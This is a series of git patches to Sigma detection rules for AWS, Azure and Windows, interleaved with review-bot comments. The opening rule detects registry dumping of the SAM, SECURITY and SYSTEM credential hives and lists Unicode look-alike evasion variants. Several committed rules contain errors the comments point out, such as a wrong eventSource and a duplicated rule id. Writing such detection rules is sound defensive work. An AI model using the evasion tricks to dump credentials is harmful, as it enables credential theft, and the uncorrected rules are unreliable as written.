- 'hkey_local_machine'
+ - 'hkey_˪ocal_machine'
+ - 'hkey_loca˪_machine'
+ - 'hkey_˪oca˪_machine'
selection_3:
CommandLine|endswith:
- '\system'
- '\sam'
- '\security'
+ - '\ˢystem'
+ - '\syˢtem'
+ - '\ˢyˢtem'
+ - '\ˢam'
+ - '\ˢecurity'
condition: selection_1 and selection_2 and selection_3
falsepositives:
- Dumping hives for legitimate purpouse i.e. backup or forensic investigation
From 9bef445f9452780157cf6ee40a8fe57e9c532b75 Mon Sep 17 00:00:00 2001
From: Austin Songer
Date: Sat, 24 Jul 2021 10:42:53 -0500
Subject: [PATCH 0086/1367] Update azure_kubernetes_pods_deleted.yml
---
rules/cloud/azure_kubernetes_pods_deleted.yml | 2 +-
1 file changed, 1 insertion(+), 1 deletion(-)
diff --git a/rules/cloud/azure_kubernetes_pods_deleted.yml b/rules/cloud/azure_kubernetes_pods_deleted.yml
index 77916784..95f31977 100644
--- a/rules/cloud/azure_kubernetes_pods_deleted.yml
+++ b/rules/cloud/azure_kubernetes_pods_deleted.yml
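Review bot: The new entries in the second hunk hard-code three substitution characters at fixed positions, so coverage is incomplete by construction: `'hklm'` gets no variant in this commit (one, `'hk˪m'`, is bolted on later in patch 0099), the keywords in `selection_1` only have one substituted letter each, and the commit message itself notes the range runs 0x02B0–0x02FF. Because `condition: selection_1 and selection_2 and selection_3` requires every selection to match, any keyword left without a variant entry remains a gap regardless of how many variants the other selections carry. Rather than growing the lists, consider normalising these code points in the ingest pipeline, or a `CommandLine|re` selection whose character class spans the range so that one pattern covers every position; whichever is chosen, annotate the intent in the rule, e.g. `# spacing-modifier-letter look-alikes (U+02B0–U+02FF), see wietzebeukema reference`.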
@@ -12,7 +12,7 @@ logsource:
detection:
selection_operation_name:
- properties.message: MICROSOFT.KUBERNETES/CONNECTEDCLUSTERS/PODS/DELETE
- condition: all of them
+ condition: selection_operation_name
level: medium
tags:
- attack.impact
From 9a9f0cf5945fb1ce0aa5fc4e5d45aab0fc7258ed Mon Sep 17 00:00:00 2001
From: Austin Songer
Date: Sat, 24 Jul 2021 10:44:06 -0500
Subject: [PATCH 0087/1367] Update azure_kubernetes_events_deleted.yml
---
rules/cloud/azure_kubernetes_events_deleted.yml | 6 +++---
1 file changed, 3 insertions(+), 3 deletions(-)
diff --git a/rules/cloud/azure_kubernetes_events_deleted.yml b/rules/cloud/azure_kubernetes_events_deleted.yml
index 4693d487..775c650a 100644
--- a/rules/cloud/azure_kubernetes_events_deleted.yml
+++ b/rules/cloud/azure_kubernetes_events_deleted.yml
@@ -10,14 +10,14 @@ references:
logsource:
service: azure.activitylogs
detection:
- selection_operationname:
+ selection_operation_name:
- properties.message: MICROSOFT.KUBERNETES/CONNECTEDCLUSTERS/EVENTS.K8S.IO/EVENTS/DELETE
- condition: all of them
+ condition: selection_operation_name
level: medium
tags:
- attack.defense_evasion
- attack.t1562
- attack.t1562.001
falsepositives:
-- Events deletions may be done by a system or network administrator. Verify whether the username, hostname, and/or resource name should be making changes in your environment. Events deletions from unfamiliar users or hosts should be investigated. If known behavior is causing false positives, it can be exempted from the rule.
+- Event deletions may be done by a system or network administrator. Verify whether the username, hostname, and/or resource name should be making changes in your environment. Events deletions from unfamiliar users or hosts should be investigated. If known behavior is causing false positives, it can be exempted from the rule.
From d7303ed7b2e7d61bd90bf93a947121205ee67774 Mon Sep 17 00:00:00 2001
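Review bot: The rewritten falsepositives line in the second hunk corrects `Events deletions` to `Event deletions` only in its first sentence; the third sentence on the same added line still reads `Events deletions from unfamiliar users or hosts should be investigated.`, so change it to `Event deletions from unfamiliar users or hosts should be investigated.` for consistency. The rename to `selection_operation_name` brings the events rule in line with the pods rule in the first hunk, which is welcome.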
From: Austin Songer
Date: Sat, 24 Jul 2021 11:09:31 -0500
Subject: [PATCH 0088/1367] Create aws_s3_data_management_tampering.yml
---
rules/aws_s3_data_management_tampering.yml | 39 ++++++++++++++++++++++
1 file changed, 39 insertions(+)
create mode 100644 rules/aws_s3_data_management_tampering.yml
diff --git a/rules/aws_s3_data_management_tampering.yml b/rules/aws_s3_data_management_tampering.yml
new file mode 100644
index 00000000..9cd4fc63
--- /dev/null
+++ b/rules/aws_s3_data_management_tampering.yml
@@ -0,0 +1,39 @@
+title: AWS S3 Data Management Tamperin
+id: 78b3756a-7804-4ef7-8555-7b9024a02e2d
+description: Detects when a user tampers with S3 data management in Amazon Web Services.
+author: Elastic, Austin Songer
+status: experimental
+date: 2021/07/24
+references:
+ - https://docs.aws.amazon.com/AmazonS3/latest/API/API_Operations.html
+ - https://docs.aws.amazon.com/AmazonS3/latest/API/API_PutBucketLogging.html
+ - https://docs.aws.amazon.com/AmazonS3/latest/API/API_PutBucketWebsite.html
+ - https://docs.aws.amazon.com/AmazonS3/latest/API/API_PutBucketEncryption.html
+ - https://docs.aws.amazon.com/AmazonS3/latest/userguide/setting-repl-config-perm-overview.html
+ - https://docs.aws.amazon.com/AmazonS3/latest/API/API_RestoreObject.html
+logsource:
+ service: cloudtrail
+detection:
+ selection_source:
+ - eventSource: iam.amazonaws.com
+ selection_eventname1:
+ - eventName: PutBucketLogging
+ selection_eventname2:
+ - eventName: PutBucketWebsite
+ selection_eventname3:
+ - eventName: PutEncryptionConfiguration
+ selection_eventname4:
+ - eventName: PutLifecycleConfiguration
+ selection_eventname5:
+ - eventName: PutReplicationConfiguration
+ selection_eventname6:
+ - eventName: ReplicateObject
+ selection_eventname7:
+ - eventName: RestoreObject
+ condition: selection_source and selection_eventname1 or selection_eventname2 or selection_eventname3 or selection_eventname4 or selection_eventname5 or selection_eventname6 or selection_eventname7
+level: low
+tags:
+ - attack.exfiltration
+ - attack.t1537
+falsepositives:
+- A S3 configuration change may be done by a system or network administrator. Verify whether the user identity, user agent, and/or hostname should be making changes in your environment. S3 configuration change from unfamiliar users or hosts should be investigated. If known behavior is causing false positives, it can be exempted from the rule.
From 64e655d6efe9d5ba3e49e94324db8da3a376ba3f Mon Sep 17 00:00:00 2001
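Review bot: `eventSource: iam.amazonaws.com` cannot match the listed operations, which are S3 API calls that CloudTrail records under `eventSource: s3.amazonaws.com`, so as written the rule never fires; the same value is carried into the re-creation under rules/cloud in patch 0090 and survives the single-selection restructure in patch 0102. Independently, `and` binds tighter than `or` in Sigma conditions, so every eventName after the first is matched without the source filter; parenthesise it as `condition: selection_source and (selection_eventname1 or selection_eventname2 or selection_eventname3 or selection_eventname4 or selection_eventname5 or selection_eventname6 or selection_eventname7)` (patch 0102 removes the problem by collapsing into one selection). The title `AWS S3 Data Management Tamperin` is missing its final letter, and the eventName values should be checked against real CloudTrail records — the reference list itself points at `API_PutBucketEncryption.html`, which does not obviously correspond to `PutEncryptionConfiguration`.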
From: Austin Songer
Date: Sat, 24 Jul 2021 11:11:21 -0500
Subject: [PATCH 0089/1367] Delete aws_s3_data_management_tampering.yml
---
rules/aws_s3_data_management_tampering.yml | 39 ----------------------
1 file changed, 39 deletions(-)
delete mode 100644 rules/aws_s3_data_management_tampering.yml
diff --git a/rules/aws_s3_data_management_tampering.yml b/rules/aws_s3_data_management_tampering.yml
deleted file mode 100644
index 9cd4fc63..00000000
--- a/rules/aws_s3_data_management_tampering.yml
+++ /dev/null
@@ -1,39 +0,0 @@
-title: AWS S3 Data Management Tamperin
-id: 78b3756a-7804-4ef7-8555-7b9024a02e2d
-description: Detects when a user tampers with S3 data management in Amazon Web Services.
-author: Elastic, Austin Songer
-status: experimental
-date: 2021/07/24
-references:
- - https://docs.aws.amazon.com/AmazonS3/latest/API/API_Operations.html
- - https://docs.aws.amazon.com/AmazonS3/latest/API/API_PutBucketLogging.html
- - https://docs.aws.amazon.com/AmazonS3/latest/API/API_PutBucketWebsite.html
- - https://docs.aws.amazon.com/AmazonS3/latest/API/API_PutBucketEncryption.html
- - https://docs.aws.amazon.com/AmazonS3/latest/userguide/setting-repl-config-perm-overview.html
- - https://docs.aws.amazon.com/AmazonS3/latest/API/API_RestoreObject.html
-logsource:
- service: cloudtrail
-detection:
- selection_source:
- - eventSource: iam.amazonaws.com
- selection_eventname1:
- - eventName: PutBucketLogging
- selection_eventname2:
- - eventName: PutBucketWebsite
- selection_eventname3:
- - eventName: PutEncryptionConfiguration
- selection_eventname4:
- - eventName: PutLifecycleConfiguration
- selection_eventname5:
- - eventName: PutReplicationConfiguration
- selection_eventname6:
- - eventName: ReplicateObject
- selection_eventname7:
- - eventName: RestoreObject
- condition: selection_source and selection_eventname1 or selection_eventname2 or selection_eventname3 or selection_eventname4 or selection_eventname5 or selection_eventname6 or selection_eventname7
-level: low
-tags:
- - attack.exfiltration
- - attack.t1537
-falsepositives:
-- A S3 configuration change may be done by a system or network administrator. Verify whether the user identity, user agent, and/or hostname should be making changes in your environment. S3 configuration change from unfamiliar users or hosts should be investigated. If known behavior is causing false positives, it can be exempted from the rule.
From d283e97415aa8d1d9ff53c93ff46aebe3b97a26c Mon Sep 17 00:00:00 2001
From: Austin Songer
Date: Sat, 24 Jul 2021 11:12:19 -0500
Subject: [PATCH 0090/1367] Create aws_s3_data_management_tampering.yml
---
.../aws_s3_data_management_tampering.yml | 39 +++++++++++++++++++
1 file changed, 39 insertions(+)
create mode 100644 rules/cloud/aws_s3_data_management_tampering.yml
diff --git a/rules/cloud/aws_s3_data_management_tampering.yml b/rules/cloud/aws_s3_data_management_tampering.yml
new file mode 100644
index 00000000..4c108805
--- /dev/null
+++ b/rules/cloud/aws_s3_data_management_tampering.yml
@@ -0,0 +1,39 @@
+title: AWS S3 Data Management Tampering
+id: 78b3756a-7804-4ef7-8555-7b9024a02e2d
+description: Detects when a user tampers with S3 data management in Amazon Web Services.
+author: Elastic, Austin Songer
+status: experimental
+date: 2021/07/24
+references:
+ - https://docs.aws.amazon.com/AmazonS3/latest/API/API_Operations.html
+ - https://docs.aws.amazon.com/AmazonS3/latest/API/API_PutBucketLogging.html
+ - https://docs.aws.amazon.com/AmazonS3/latest/API/API_PutBucketWebsite.html
+ - https://docs.aws.amazon.com/AmazonS3/latest/API/API_PutBucketEncryption.html
+ - https://docs.aws.amazon.com/AmazonS3/latest/userguide/setting-repl-config-perm-overview.html
+ - https://docs.aws.amazon.com/AmazonS3/latest/API/API_RestoreObject.html
+logsource:
+ service: cloudtrail
+detection:
+ selection_source:
+ - eventSource: iam.amazonaws.com
+ selection_eventname1:
+ - eventName: PutBucketLogging
+ selection_eventname2:
+ - eventName: PutBucketWebsite
+ selection_eventname3:
+ - eventName: PutEncryptionConfiguration
+ selection_eventname4:
+ - eventName: PutLifecycleConfiguration
+ selection_eventname5:
+ - eventName: PutReplicationConfiguration
+ selection_eventname6:
+ - eventName: ReplicateObject
+ selection_eventname7:
+ - eventName: RestoreObject
+ condition: selection_source and selection_eventname1 or selection_eventname2 or selection_eventname3 or selection_eventname4 or selection_eventname5 or selection_eventname6 or selection_eventname7
+level: low
+tags:
+ - attack.exfiltration
+ - attack.t1537
+falsepositives:
+- A S3 configuration change may be done by a system or network administrator. Verify whether the user identity, user agent, and/or hostname should be making changes in your environment. S3 configuration change from unfamiliar users or hosts should be investigated. If known behavior is causing false positives, it can be exempted from the rule.
From 99c2edb608a07f0ea083a82b88f80410709ba011 Mon Sep 17 00:00:00 2001
From: Austin Songer
Date: Sat, 24 Jul 2021 11:17:18 -0500
Subject: [PATCH 0091/1367] Update aws_s3_data_management_tampering.yml
---
rules/cloud/aws_s3_data_management_tampering.yml | 5 +++--
1 file changed, 3 insertions(+), 2 deletions(-)
diff --git a/rules/cloud/aws_s3_data_management_tampering.yml b/rules/cloud/aws_s3_data_management_tampering.yml
index 4c108805..20a38183 100644
--- a/rules/cloud/aws_s3_data_management_tampering.yml
+++ b/rules/cloud/aws_s3_data_management_tampering.yml
@@ -1,10 +1,11 @@
-title: AWS S3 Data Management Tampering
+title: AWS S3 Data Management Tamperin
id: 78b3756a-7804-4ef7-8555-7b9024a02e2d
description: Detects when a user tampers with S3 data management in Amazon Web Services.
-author: Elastic, Austin Songer
+author: Austin Songer
status: experimental
date: 2021/07/24
references:
+ - https://github.com/elastic/detection-rules/pull/1145/files
- https://docs.aws.amazon.com/AmazonS3/latest/API/API_Operations.html
- https://docs.aws.amazon.com/AmazonS3/latest/API/API_PutBucketLogging.html
- https://docs.aws.amazon.com/AmazonS3/latest/API/API_PutBucketWebsite.html
From 8a1909ccc276990cfd1f311ffdc3cca4b925d3ee Mon Sep 17 00:00:00 2001
From: Austin Songer
Date: Sat, 24 Jul 2021 11:32:07 -0500
Subject: [PATCH 0092/1367] Create aws_sts_getsessiontoken_abuse.yml
---
rules/cloud/aws_sts_getsessiontoken_abuse.yml | 27 +++++++++++++++++++
1 file changed, 27 insertions(+)
create mode 100644 rules/cloud/aws_sts_getsessiontoken_abuse.yml
diff --git a/rules/cloud/aws_sts_getsessiontoken_abuse.yml b/rules/cloud/aws_sts_getsessiontoken_abuse.yml
new file mode 100644
index 00000000..682b1d00
--- /dev/null
+++ b/rules/cloud/aws_sts_getsessiontoken_abuse.yml
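Review bot: The new title line `+title: AWS S3 Data Management Tamperin` reintroduces the truncated word that the re-creation in patch 0090 had just corrected; keep `title: AWS S3 Data Management Tampering`. Dropping `Elastic` from `author` in the same hunk while adding the Elastic pull request as the first reference reads as an accidental pairing — if the convention is to credit only the porter and cite the source in references, fine, but the two edits should be deliberate and consistent with the other ported rules in this series, which keep `author: Austin Songer` and cite the Elastic PR.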
@@ -0,0 +1,27 @@
+title: AWS STS GetSessionToken Abuse
+id: b45ab1d2-712f-4f01-a751-df3826969807
+description: Identifies the suspicious use of GetSessionToken. Tokens could be created and used by attackers to move laterally and escalate privileges.
+author: Austin Songer
+status: experimental
+date: 2021/07/24
+references:
+ - https://docs.aws.amazon.com/STS/latest/APIReference/API_GetSessionToken.html
+logsource:
+ service: cloudtrail
+detection:
+ selection_source:
+ - eventSource: sts.amazonaws.com
+ selection_eventname1:
+ - eventName: GetSessionToken
+ selection_usertype:
+ - userIdentity.type: IAMUser
+ condition: all of them
+level: low
+tags:
+ - attack.lateral_movement
+ - attack.privilege_escalation
+ - attack.t1548
+ - attack.t1550
+ - attack.t1550.001
+falsepositives:
+- GetSessionToken may be done by a system or network administrator. Verify whether the user identity, user agent, and/or hostname should be making changes in your environment. GetSessionToken from unfamiliar users or hosts should be investigated. If known behavior is causing false positives, it can be exempted from the rule.
From 9fe7b8799586f330fd39356d12c139dacd3e6040 Mon Sep 17 00:00:00 2001
From: Austin Songer
Date: Sat, 24 Jul 2021 11:33:01 -0500
Subject: [PATCH 0093/1367] Delete aws_sts_getsessiontoken_abuse.yml
---
rules/cloud/aws_sts_getsessiontoken_abuse.yml | 27 -------------------
1 file changed, 27 deletions(-)
delete mode 100644 rules/cloud/aws_sts_getsessiontoken_abuse.yml
diff --git a/rules/cloud/aws_sts_getsessiontoken_abuse.yml b/rules/cloud/aws_sts_getsessiontoken_abuse.yml
deleted file mode 100644
index 682b1d00..00000000
--- a/rules/cloud/aws_sts_getsessiontoken_abuse.yml
+++ /dev/null
@@ -1,27 +0,0 @@
-title: AWS STS GetSessionToken Abuse
-id: b45ab1d2-712f-4f01-a751-df3826969807
-description: Identifies the suspicious use of GetSessionToken. Tokens could be created and used by attackers to move laterally and escalate privileges.
-author: Austin Songer
-status: experimental
-date: 2021/07/24
-references:
- - https://docs.aws.amazon.com/STS/latest/APIReference/API_GetSessionToken.html
-logsource:
- service: cloudtrail
-detection:
- selection_source:
- - eventSource: sts.amazonaws.com
- selection_eventname1:
- - eventName: GetSessionToken
- selection_usertype:
- - userIdentity.type: IAMUser
- condition: all of them
-level: low
-tags:
- - attack.lateral_movement
- - attack.privilege_escalation
- - attack.t1548
- - attack.t1550
- - attack.t1550.001
-falsepositives:
-- GetSessionToken may be done by a system or network administrator. Verify whether the user identity, user agent, and/or hostname should be making changes in your environment. GetSessionToken from unfamiliar users or hosts should be investigated. If known behavior is causing false positives, it can be exempted from the rule.
From e0238424639fefba02f894401b55ee02afa63a1d Mon Sep 17 00:00:00 2001
From: Austin Songer
Date: Sat, 24 Jul 2021 12:03:35 -0500
Subject: [PATCH 0094/1367] Create aws_sts_assumedrole_misuse.yml
---
rules/cloud/aws_sts_assumedrole_misuse.yml | 29 ++++++++++++++++++++++
1 file changed, 29 insertions(+)
create mode 100644 rules/cloud/aws_sts_assumedrole_misuse.yml
diff --git a/rules/cloud/aws_sts_assumedrole_misuse.yml b/rules/cloud/aws_sts_assumedrole_misuse.yml
new file mode 100644
index 00000000..8d28cd44
--- /dev/null
+++ b/rules/cloud/aws_sts_assumedrole_misuse.yml
@@ -0,0 +1,29 @@
+title: AWS STS AssumedRole Misuse
+id: b45ab1d2-712f-4f01-a751-df3826969807
+description: Identifies the suspicious use of AssumedRole. Attackers could move laterally and escalate privileges.
+author: Austin Songer
+status: experimental
+date: 2021/07/24
+references:
+ - https://github.com/elastic/detection-rules/pull/1214
+ - https://docs.aws.amazon.com/STS/latest/APIReference/API_AssumeRole.html
+logsource:
+ service: cloudtrail
+detection:
+ selection_source:
+ - eventSource: sts.amazonaws.com
+ selection_eventname1:
+ - eventName: AssumedRole
+ selection_userrole:
+ - userIdentity.sessionContext: Role
+ condition: all of them
+level: low
+tags:
+ - attack.lateral_movement
+ - attack.privilege_escalation
+ - attack.t1548
+ - attack.t1550
+ - attack.t1550.001
+falsepositives:
+- AssumedRole may be done by a system or network administrator. Verify whether the user identity, user agent, and/or hostname should be making changes in your environment. AssumedRole from unfamiliar users or hosts should be investigated. If known behavior is causing false positives, it can be exempted from the rule.
+- Automated processes that uses Terraform may lead to false positives.
From d9f70366b62168e247403ef4ea58b87bce4be843 Mon Sep 17 00:00:00 2001
From: Austin Songer
Date: Sat, 24 Jul 2021 12:05:44 -0500
Subject: [PATCH 0095/1367] Create aws_sts_getsessiontoken_misuse.yml
---
.../cloud/aws_sts_getsessiontoken_misuse.yml | 28 +++++++++++++++++++
1 file changed, 28 insertions(+)
create mode 100644 rules/cloud/aws_sts_getsessiontoken_misuse.yml
diff --git a/rules/cloud/aws_sts_getsessiontoken_misuse.yml b/rules/cloud/aws_sts_getsessiontoken_misuse.yml
new file mode 100644
index 00000000..265b18f7
--- /dev/null
+++ b/rules/cloud/aws_sts_getsessiontoken_misuse.yml
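Review bot: `id: b45ab1d2-712f-4f01-a751-df3826969807` is the id of the GetSessionToken rule deleted in patch 0093 and is used again by `aws_sts_getsessiontoken_misuse.yml` created at the next hunk, so two live rules share one identifier; generate a fresh UUID for this file. `eventName: AssumedRole` is not an STS API action — the call documented by the referenced `API_AssumeRole.html` page is logged as `AssumeRole`, while `AssumedRole` is the `userIdentity.type` value that sessions created by that call carry. `userIdentity.sessionContext: Role` compares a nested CloudTrail object against a string and will not match; presumably `userIdentity.sessionContext.sessionIssuer.type: Role` was intended, as in the Elastic rule cited. All three values survive the restructure into a single `selection` in patch 0097, so they need fixing there as well. The second falsepositives entry should read `Automated processes that use Terraform may lead to false positives.`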
@@ -0,0 +1,28 @@
+title: AWS STS GetSessionToken Misuse
+id: b45ab1d2-712f-4f01-a751-df3826969807
+description: Identifies the suspicious use of GetSessionToken. Tokens could be created and used by attackers to move laterally and escalate privileges.
+author: Austin Songer
+status: experimental
+date: 2021/07/24
+references:
+ - https://github.com/elastic/detection-rules/pull/1213
+ - https://docs.aws.amazon.com/STS/latest/APIReference/API_GetSessionToken.html
+logsource:
+ service: cloudtrail
+detection:
+ selection_source:
+ - eventSource: sts.amazonaws.com
+ selection_eventname1:
+ - eventName: GetSessionToken
+ selection_usertype:
+ - userIdentity.type: IAMUser
+ condition: all of them
+level: low
+tags:
+ - attack.lateral_movement
+ - attack.privilege_escalation
+ - attack.t1548
+ - attack.t1550
+ - attack.t1550.001
+falsepositives:
+- GetSessionToken may be done by a system or network administrator. Verify whether the user identity, user agent, and/or hostname should be making changes in your environment. GetSessionToken from unfamiliar users or hosts should be investigated. If known behavior is causing false positives, it can be exempted from the rule.
From ebe7e4c89e974319b396288582918f7dc4505ee9 Mon Sep 17 00:00:00 2001
From: Austin Songer
Date: Sat, 24 Jul 2021 16:18:06 -0500
Subject: [PATCH 0096/1367] Update aws_sts_getsessiontoken_misuse.yml
---
rules/cloud/aws_sts_getsessiontoken_misuse.yml | 12 +++++-------
1 file changed, 5 insertions(+), 7 deletions(-)
diff --git a/rules/cloud/aws_sts_getsessiontoken_misuse.yml b/rules/cloud/aws_sts_getsessiontoken_misuse.yml
index 265b18f7..71ec2267 100644
--- a/rules/cloud/aws_sts_getsessiontoken_misuse.yml
+++ b/rules/cloud/aws_sts_getsessiontoken_misuse.yml
@@ -10,13 +10,11 @@ references:
logsource:
service: cloudtrail
detection:
- selection_source:
- - eventSource: sts.amazonaws.com
- selection_eventname1:
- - eventName: GetSessionToken
- selection_usertype:
- - userIdentity.type: IAMUser
- condition: all of them
+ selection:
+ eventSource: sts.amazonaws.com
+ eventName: GetSessionToken
+ userIdentity.type: IAMUser
+ condition: selection
level: low
tags:
- attack.lateral_movement
From 67c17b9330552b95c47d7774a173a88efb694b95 Mon Sep 17 00:00:00 2001
From: Austin Songer
Date: Sat, 24 Jul 2021 16:18:34 -0500
Subject: [PATCH 0097/1367] Update aws_sts_assumedrole_misuse.yml
---
rules/cloud/aws_sts_assumedrole_misuse.yml | 12 +++++-------
1 file changed, 5 insertions(+), 7 deletions(-)
diff --git a/rules/cloud/aws_sts_assumedrole_misuse.yml b/rules/cloud/aws_sts_assumedrole_misuse.yml
index 8d28cd44..869c4f2d 100644
--- a/rules/cloud/aws_sts_assumedrole_misuse.yml
+++ b/rules/cloud/aws_sts_assumedrole_misuse.yml
@@ -10,13 +10,11 @@ references:
logsource:
service: cloudtrail
detection:
- selection_source:
- - eventSource: sts.amazonaws.com
- selection_eventname1:
- - eventName: AssumedRole
- selection_userrole:
- - userIdentity.sessionContext: Role
- condition: all of them
+ selection:
+ eventSource: sts.amazonaws.com
+ eventName: AssumedRole
+ userIdentity.sessionContext: Role
+ condition: selection
level: low
tags:
- attack.lateral_movement
From 1405ae274e49dc4a953e7ec33646e73e5d01fd89 Mon Sep 17 00:00:00 2001
From: Austin Songer
Date: Sat, 24 Jul 2021 16:20:00 -0500
Subject: [PATCH 0098/1367] Update aws_elasticache_security_group_created.yml
---
rules/cloud/aws_elasticache_security_group_created.yml | 9 ++++-----
1 file changed, 4 insertions(+), 5 deletions(-)
diff --git a/rules/cloud/aws_elasticache_security_group_created.yml b/rules/cloud/aws_elasticache_security_group_created.yml
index c0df4df4..26c08a75 100644
--- a/rules/cloud/aws_elasticache_security_group_created.yml
+++ b/rules/cloud/aws_elasticache_security_group_created.yml
@@ -9,11 +9,10 @@ references:
logsource:
service: cloudtrail
detection:
- selection_source:
- - eventSource: elasticache.amazonaws.com
- selection_eventname:
- - eventName: "Create Cache Security Group"
- condition: all of them
+ selection:
+ eventSource: elasticache.amazonaws.com
+ eventName: "Create Cache Security Group"
+ condition: selection
level: low
tags:
- attack.persistence
From 2b57f95e72fedf9d61e8ef61572dd17fd756112b Mon Sep 17 00:00:00 2001
From: John Lambert
Date: Sat, 24 Jul 2021 18:17:27 -0500
Subject: [PATCH 0099/1367] Update win_grabbing_sensitive_hives_via_reg.yml
---
.../process_creation/win_grabbing_sensitive_hives_via_reg.yml | 1 +
1 file changed, 1 insertion(+)
diff --git a/rules/windows/process_creation/win_grabbing_sensitive_hives_via_reg.yml b/rules/windows/process_creation/win_grabbing_sensitive_hives_via_reg.yml
index 2ea66c74..1a3788ee 100644
--- a/rules/windows/process_creation/win_grabbing_sensitive_hives_via_reg.yml
+++ b/rules/windows/process_creation/win_grabbing_sensitive_hives_via_reg.yml
@@ -29,6 +29,7 @@ detection:
selection_2:
CommandLine|contains:
- 'hklm'
+ - 'hk˪m'
- 'hkey_local_machine'
- 'hkey_˪ocal_machine'
- 'hkey_loca˪_machine'
From b7fc362f4ae58dbf1a41f8b6b53f7e68dba0d18a Mon Sep 17 00:00:00 2001
From: Austin Songer
Date: Sun, 25 Jul 2021 02:22:13 -0500
Subject: [PATCH 0100/1367] Update aws_route_53_domain_transferred_lock_disabled.yml
---
.../aws_route_53_domain_transferred_lock_disabled.yml | 9 ++++-----
1 file changed, 4 insertions(+), 5 deletions(-)
diff --git a/rules/cloud/aws_route_53_domain_transferred_lock_disabled.yml b/rules/cloud/aws_route_53_domain_transferred_lock_disabled.yml
index 5f7ab706..f979bfea 100644
--- a/rules/cloud/aws_route_53_domain_transferred_lock_disabled.yml
+++ b/rules/cloud/aws_route_53_domain_transferred_lock_disabled.yml
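Review bot: The new `eventName: "Create Cache Security Group"` in the elasticache hunk is the console's human-readable label, not a CloudTrail eventName; CloudTrail records the API action without spaces, so the restructured selection matches nothing — use `eventName: CreateCacheSecurityGroup`. The sibling ingress/egress rule touched in the first hunk of this chunk (patch 0076) carries the same spaced form for `Authorize Cache Security Group Ingress` and `Revoke Cache Security Group Ingress`, and its `AuthorizeCacheSecurityGroupEgress` / `RevokeCacheSecurityGroupEgress` values should be checked against the ElastiCache API reference, which as far as I can tell defines only ingress operations. A short comment on the selection, e.g. `# eventName is the CloudTrail API action name, not the console label`, would stop this recurring across the series.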
@@ -11,11 +11,10 @@ references: logsource: service: cloudtrail detection: - selection_source: - - eventSource: route53.amazonaws.com - selection_eventname: - - eventName: DisableDomainTransferLock - condition: all of them + selection: + eventSource: route53.amazonaws.com + eventName: DisableDomainTransferLock + condition: selection level: low tags: - attack.persistence From 0a07795a4ecd6dcf7d9b7d7d4501147733730bab Mon Sep 17 00:00:00 2001 From: Austin Songer Date: Sun, 25 Jul 2021 02:24:22 -0500 Subject: [PATCH 0101/1367] Update aws_route_53_domain_transferred_to_another_account.yml --- ...ws_route_53_domain_transferred_to_another_account.yml | 9 ++++----- 1 file changed, 4 insertions(+), 5 deletions(-) diff --git a/rules/cloud/aws_route_53_domain_transferred_to_another_account.yml b/rules/cloud/aws_route_53_domain_transferred_to_another_account.yml index a37bd58a..d5ec0275 100644 --- a/rules/cloud/aws_route_53_domain_transferred_to_another_account.yml +++ b/rules/cloud/aws_route_53_domain_transferred_to_another_account.yml @@ -9,11 +9,10 @@ references: logsource: service: cloudtrail detection: - selection_source: - - eventSource: route53.amazonaws.com - selection_eventname: - - eventName: TransferDomainToAnotherAwsAccount - condition: all of them + selection: + eventSource: route53.amazonaws.com + eventName: TransferDomainToAnotherAwsAccount + condition: selection tags: - attack.persistence - attack.credential_access From 1be402e7915dce0b65da19fe19f6c4a69d431a72 Mon Sep 17 00:00:00 2001 From: Austin Songer Date: Sun, 25 Jul 2021 02:25:24 -0500 Subject: [PATCH 0102/1367] Update aws_s3_data_management_tampering.yml --- .../aws_s3_data_management_tampering.yml | 28 ++++++++----------- 1 file changed, 11 insertions(+), 17 deletions(-) diff --git a/rules/cloud/aws_s3_data_management_tampering.yml b/rules/cloud/aws_s3_data_management_tampering.yml index 20a38183..4787fd14 100644 --- a/rules/cloud/aws_s3_data_management_tampering.yml 
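Review bot: `eventSource: route53.amazonaws.com` in the new `selection` looks like the wrong service for `DisableDomainTransferLock`: domain-registration actions belong to the Route 53 Domains API and, to my knowledge, are logged with `eventSource: route53domains.amazonaws.com` (and only in us-east-1, as a global service), so ANDing this eventSource in should never match. The same applies to `TransferDomainToAnotherAwsAccount` in the following hunk. I would change both to `eventSource: route53domains.amazonaws.com` and verify against a CloudTrail sample, since the commit only reshapes the selection and does not touch the values.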
+++ b/rules/cloud/aws_s3_data_management_tampering.yml @@ -15,23 +15,17 @@ references: logsource: service: cloudtrail detection: - selection_source: - - eventSource: iam.amazonaws.com - selection_eventname1: - - eventName: PutBucketLogging - selection_eventname2: - - eventName: PutBucketWebsite - selection_eventname3: - - eventName: PutEncryptionConfiguration - selection_eventname4: - - eventName: PutLifecycleConfiguration - selection_eventname5: - - eventName: PutReplicationConfiguration - selection_eventname6: - - eventName: ReplicateObject - selection_eventname7: - - eventName: RestoreObject - condition: selection_source and selection_eventname1 or selection_eventname2 or selection_eventname3 or selection_eventname4 or selection_eventname5 or selection_eventname6 or selection_eventname7 + selection: + eventSource: iam.amazonaws.com + eventName: + - PutBucketLogging + - PutBucketWebsite + - PutEncryptionConfiguration + - PutLifecycleConfiguration + - PutReplicationConfiguration + - ReplicateObject + - RestoreObject + condition: selection level: low tags: - attack.exfiltration From 288e4b502f5bbee8e5a145bf54cf65c3d24b7338 Mon Sep 17 00:00:00 2001 From: Sittikorn S <61369934+BlackB0lt@users.noreply.github.com> Date: Mon, 26 Jul 2021 15:14:44 +0700 Subject: [PATCH 0103/1367] Create aws_macic_evasion --- rules/cloud/aws_macic_evasion | 36 +++++++++++++++++++++++++++++++++++ 1 file changed, 36 insertions(+) create mode 100644 rules/cloud/aws_macic_evasion diff --git a/rules/cloud/aws_macic_evasion b/rules/cloud/aws_macic_evasion new file mode 100644 index 00000000..f2305ac3 --- /dev/null +++ b/rules/cloud/aws_macic_evasion 
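Review bot: The merged `selection` still pins `eventSource: iam.amazonaws.com` while every listed `eventName` (`PutBucketLogging`, `PutBucketWebsite`, `PutEncryptionConfiguration`, `PutLifecycleConfiguration`, `PutReplicationConfiguration`, `ReplicateObject`, `RestoreObject`) is an S3 API action logged with `eventSource: s3.amazonaws.com`. The removed condition's missing parentheses let `selection_eventname2` through `selection_eventname7` bypass the source check entirely, which is probably why the rule appeared to work; the corrected `condition: selection` now ANDs the source in, so the rule goes silent. Change the line to `eventSource: s3.amazonaws.com`. Note that `ReplicateObject` and `RestoreObject` are data-plane events that only appear if S3 data-event logging is enabled on the trail, which is worth stating in the description or falsepositives (outside the hunk).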
